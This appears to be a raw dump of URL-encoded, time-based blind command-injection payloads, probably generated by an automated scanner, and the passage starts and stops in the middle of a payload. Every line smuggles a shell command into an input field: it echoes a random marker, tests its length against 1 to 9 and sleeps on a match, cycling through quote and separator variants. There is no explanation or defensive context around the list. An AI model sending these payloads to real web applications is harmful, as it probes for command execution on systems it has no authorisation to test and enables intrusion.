4%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AUSQYM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%0A%20str%3D%24%28echo%20JZOJBE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20ZAHUZD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20RDJFGW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20PRKGES%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%0A%20str%3D%24%28echo%20WUDXTS%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%3B%20str%3D%24%28echo%20AUJGTN%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XDAIBC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2527%0A%20str%3D%24%28echo%20GBKLLU%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%3B%20str%3D%24%28echo%20KGCQCV%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20JTLWWU%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2522%3B%20str%3D%24%28echo%20IOBNNP%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%2